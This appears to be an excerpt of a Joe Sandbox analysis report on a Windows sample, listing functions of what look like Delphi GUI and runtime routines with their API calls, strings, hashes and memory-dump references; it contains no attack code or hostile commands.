Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Char
String ID: PASSWORD$STANDARD$USER NAME
API String ID: 751630497-2375259284
Opcode ID: 34da60760d0746e70f6bddcf47079dad2ac8123bd0eb0972c39b20de888f5d2f
Instruction ID: a778804f36544e9c9241c3b173f2779d3bc647173704a140a311082aefcaf00c
Opcode Fuzzy Hash: 34da60760d0746e70f6bddcf47079dad2ac8123bd0eb0972c39b20de888f5d2f
Instruction Fuzzy Hash: 02917834A04209AFDB11EF95C851ADEBBB5EF48314F5088A7F400A7381DB79EE45CB59

Function 00496F68 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219windowCOMMON

Download Yara Rule

APIs

PostMessageA.USER32(00000000,00000400,00000000,00000000), ref: 00496FDF

Strings

%4.4d, xrefs: 00497071
0000, xrefs: 0049725E
ticalSection, xrefs: 00496F8F, 004970FF, 00497146, 00497158, 00497162, 004971D0

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: MessagePost
String ID: %4.4d$0000$ticalSection
API String ID: 410705778-3957248727
Opcode ID: 5feb33174ef1f34950738f8e38c97413ea07f4fd57d6418aa46a882aeb50191f
Instruction ID: 11d059809e1f250a81aed002d35b3d402cbfa2395235015333283115692d2679
Opcode Fuzzy Hash: 5feb33174ef1f34950738f8e38c97413ea07f4fd57d6418aa46a882aeb50191f
Instruction Fuzzy Hash: F9A12D34A145058FCB00EF69C985B99BBF1EF84315F1481BAEC05AF366DB38AD45CB68

Function 00496AE4 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 217windowCOMMON

Download Yara Rule

APIs

PostMessageA.USER32(00000000,00000400,00000000,00000000), ref: 00496B59

Strings

%3.3d, xrefs: 00496BDE
000, xrefs: 00496DCB
ticalSection, xrefs: 00496B0B, 00496C6C, 00496CB3, 00496CC5, 00496CCF, 00496D3D

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: MessagePost
String ID: %3.3d$000$ticalSection
API String ID: 410705778-2281974578
Opcode ID: 803cca079d06da4dc3ef2a9c7ba453be1f120e601f8e1715e68228beb239798b
Instruction ID: d0cb35c95b2c49022f245490b7c62c2cb3be055897286ccc675754b7eed62913
Opcode Fuzzy Hash: 803cca079d06da4dc3ef2a9c7ba453be1f120e601f8e1715e68228beb239798b
Instruction Fuzzy Hash: CFA11C34A011098FCB00EF69C585B9A7BF5EF48304F1541BAEC15AF3A6DB38AE41CB64

Function 00427594 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 190COMMON

Download Yara Rule

APIs

Part of subcall function 00421948: GetActiveWindow.USER32 ref: 0042194B
Part of subcall function 00421948: GetCurrentThreadId.KERNEL32 ref: 00421960
Part of subcall function 00421948: 73EA5940.USER32(00000000,Function_00021924), ref: 00421966

Part of subcall function 00425AEC: GetSystemMetrics.USER32(00000000), ref: 00425AEE

OffsetRect.USER32(?,?,?), ref: 0042767D
DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00427740
OffsetRect.USER32(?,?,?), ref: 00427751

Part of subcall function 00425E18: GetCurrentThreadId.KERNEL32 ref: 00425E2D
Part of subcall function 00425E18: SetWindowsHookExA.USER32(00000003,00425DD4,00000000,00000000), ref: 00425E3D
Part of subcall function 00425E18: CreateThread.KERNEL32(00000000,000003E8,00425D84,00000000,00000000), ref: 00425E61

Part of subcall function 004273E0: SetTimer.USER32(00000000,00000001,?,00425D68), ref: 004273FB

Strings

*uB, xrefs: 004275A7, 00427685

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Thread$CurrentOffsetRect$A5940ActiveCreateDrawHookMetricsSystemTextTimerWindowWindows
String ID: *uB
API String ID: 1334498448-112427
Opcode ID: 5b4452bab0de4b39e4ab5746d49a455a37aae7bd4e848bf15f7070b040498200
Instruction ID: 9d843511b5cc9dab59e02acc9781fe0e93830388125b7ce4aa48c1eaf348e955
Opcode Fuzzy Hash: 5b4452bab0de4b39e4ab5746d49a455a37aae7bd4e848bf15f7070b040498200
Instruction Fuzzy Hash: D4811571A04218CFCB14DFA9D884ADEBBF4BF48314F50416AE804AB296E738AD45CF54

Function 00441670 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,00000469,00000000,00000000), ref: 00441740
SendMessageA.USER32(00000000,00000469,00000000,00000000), ref: 004417F2

Strings

TDBEdit, xrefs: 004417A4
TDBMemo, xrefs: 004417B9

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: MessageSend
String ID: TDBEdit$TDBMemo
API String ID: 3850602802-2833401046
Opcode ID: 726a6e3d0c0c037eeb6b8ccf9530f4e85fa9748c5b92ad791683cbb8ab261288
Instruction ID: 26b793f7507efa680beb6c8acbd5284685d7fb0da4c4eae424b37ce2b7d1d8fb
Opcode Fuzzy Hash: 726a6e3d0c0c037eeb6b8ccf9530f4e85fa9748c5b92ad791683cbb8ab261288
Instruction Fuzzy Hash: B14196307002004BEB11FF6999826AE77A99F55348F25447BBC44EB3A7DBBDDC81869C

Function 00402068 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.KERNEL32(\$,00000000,004021DC), ref: 004020AB

Part of subcall function 004019AC: RtlInitializeCriticalSection.KERNEL32(\$,00000000,00401A62), ref: 004019C2
Part of subcall function 004019AC: RtlEnterCriticalSection.KERNEL32(\$,\$,00000000,00401A62), ref: 004019D5
Part of subcall function 004019AC: LocalAlloc.KERNEL32(00000000,00000FF8,\$,00000000,00401A62), ref: 004019FF
Part of subcall function 004019AC: RtlLeaveCriticalSection.KERNEL32(\$,00401A69,00000000,00401A62), ref: 00401A5C

Strings

#, xrefs: 0040214F, 004021A4
\$, xrefs: 004020A6, 004021D1

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
String ID: \$$#
API String ID: 296031713-1265709040
Opcode ID: 82edb433ec6643bc803e35e14f8cfb3a3df4637909e9d112cbe9abbb072dc1c8
Instruction ID: f77b3c11978f495dfe38fe797f62ebbfeca5761e2a1cc0e62cad1a4b8d0e91d8
Opcode Fuzzy Hash: 82edb433ec6643bc803e35e14f8cfb3a3df4637909e9d112cbe9abbb072dc1c8
Instruction Fuzzy Hash: 6E41B0B2A01301DFEB10CF689D4522A7FA0F75A328F15427BDA54AB7D2D378A941CB58

Function 00414820 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 00414330: ReleaseCapture.USER32 ref: 00414333

SetCursor.USER32(000A2BAA,00000000,0041497F), ref: 00414877

Part of subcall function 0041A1F0: 74F109A0.COMCTL32(00000000,?,004146DA,?,?,?,?,004143B7,00000000,004143CA), ref: 0041A20C
Part of subcall function 0041A1F0: ShowCursor.USER32(00000001,00000000,?,004146DA,?,?,?,?,004143B7,00000000,004143CA), ref: 0041A229

Strings

:+, xrefs: 0041488A, 0041490C, 0041492F, 0041493F
^+, xrefs: 00414844
N+, xrefs: 0041491D

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Cursor$CaptureF109ReleaseShow
String ID: :+$N+$^+
API String ID: 748196173-315977909
Opcode ID: 389d8748460c3ed201ead9b9e18640e182f5aacc3bde6b946b28c92b23395f9d
Instruction ID: a83a44a7881b9213af6e4e9a3dd9c43bc35458b9c2542b9c1fb8d3a07322cae8
Opcode Fuzzy Hash: 389d8748460c3ed201ead9b9e18640e182f5aacc3bde6b946b28c92b23395f9d
Instruction Fuzzy Hash: 49310A74E00244AFD744EF6AD950A9A7BE6EB8A300B148477E814E7360EB389D81DF58

Function 0041E9E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,00006338,00000000), ref: 0041EA7D
MulDiv.KERNEL32(?,00006338,00000000), ref: 0041EA9A
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,00006338,00000000,?,00006338,00000000), ref: 0041EAC6

Strings

`, xrefs: 0041EA62

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: BitsFileMeta
String ID: `
API String ID: 858000408-2679148245
Opcode ID: 8fde016e7dace03da0cda69d9737449f77844b31ed3a9a3ead46b50b2632f1e9
Instruction ID: 59d9be717d978cadcc099680698d80dde70284a5eeb88fdb2c0f35799b7f8b9e
Opcode Fuzzy Hash: 8fde016e7dace03da0cda69d9737449f77844b31ed3a9a3ead46b50b2632f1e9
Instruction Fuzzy Hash: 2F313975E00619AFDB00DFA9C8859AEBBF5FF48700F50846AE814F7241E7799E84CB64

Function 00416C78 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

GetClassInfoA.USER32(00400000,?,?), ref: 00416CE7
UnregisterClassA.USER32(?,00400000), ref: 00416D13
RegisterClassA.USER32(?), ref: 00416D36

Strings

@, xrefs: 00416C91

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Class$InfoRegisterUnregister
String ID: @
API String ID: 3749476976-2766056989
Opcode ID: 97a227d59dcd68c7b5630622745f4efc53f02c4f94c054278726bc215a4e5580
Instruction ID: 952bc5d3a1a3ba7fc23807eae9851bf1838d61022c74ace2b0950172c4b613ae
Opcode Fuzzy Hash: 97a227d59dcd68c7b5630622745f4efc53f02c4f94c054278726bc215a4e5580
Instruction Fuzzy Hash: 5C319E706043018BD710EF68D581B9B77E9AB84308F00447EFA48DB392DB3AD949CB6A

Function 004186B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(00000000), ref: 004186CF
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000097), ref: 004186FE
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000057), ref: 0041874E

Strings

tion, xrefs: 004186B2

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Window$Visible
String ID: tion
API String ID: 3657826678-3396346703
Opcode ID: 3d8e5140b1e9ac4d5ed5324e670c040e1047f322266907e7e43e2bd54f20bed7
Instruction ID: bf7fed51b31a7e187bcaa00b2c48c7abeb9f863f038d9c502d4b7a5c5a64a5fa
Opcode Fuzzy Hash: 3d8e5140b1e9ac4d5ed5324e670c040e1047f322266907e7e43e2bd54f20bed7
Instruction Fuzzy Hash: FC016D703046006BD610B6398C81B9F66C95F89758F08482FF598DB3C2DEACDC8187AA

Function 0041C908 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

SelectObject.GDI32(?,000A2C00), ref: 0041C92B
SelectObject.GDI32(?,000A2C0E), ref: 0041C93A
SelectObject.GDI32(?,000A2C20), ref: 0041C949

Strings

,, xrefs: 0041C93F

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: ObjectSelect
String ID: ,
API String ID: 1517587568-518528322
Opcode ID: a3cb7242a07892b549e4e39047c4a0a914dbddc61c5a2c257b6788079b71e487
Instruction ID: 2f7c8c9162d5f72ac7b8a6f27807068b67a160379639784a2500550fb17b0216
Opcode Fuzzy Hash: a3cb7242a07892b549e4e39047c4a0a914dbddc61c5a2c257b6788079b71e487
